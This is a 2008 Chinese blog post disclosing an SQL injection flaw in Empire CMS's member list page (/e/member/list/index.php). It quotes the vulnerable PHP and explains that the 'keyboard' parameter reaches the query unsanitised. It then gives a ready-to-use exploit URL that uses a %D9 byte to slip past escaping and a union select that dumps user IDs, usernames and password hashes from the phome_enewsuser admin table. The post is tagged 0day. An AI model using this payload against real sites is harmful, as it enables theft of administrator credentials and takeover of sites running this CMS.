飘零的代码 piao2010 ’s blog

帝国ECMS /e/member/list/index.php文件:

if($sear)
{
 $keyboard=RepPostVar2($_GET['keyboard']);
 if($keyboard)
 {
  $add.=$where.$user_username.” like ‘%$keyboard%’”;
 }
 $search.=”&sear=1&keyboard=$keyboard”;
}

判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞.

利用方法:

/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9′+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*

相关日志

• worldpress插件shortstat XSS （0day） (2)
• 邪恶的空格-PHP本地文件包含漏洞的新突破口! (0)
• 搜狗输入法0day漏洞获取系统权限 (7)
• 揭示PHP成功背后的秘密：PHP创始人访谈录 (0)
• 手机短信天气预报自动发送程序 (23)

Tags: 0day, PHP

This entry was posted on 星期一, 8月 18th, 2008 at 13:31 and is filed under 搬家之前. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.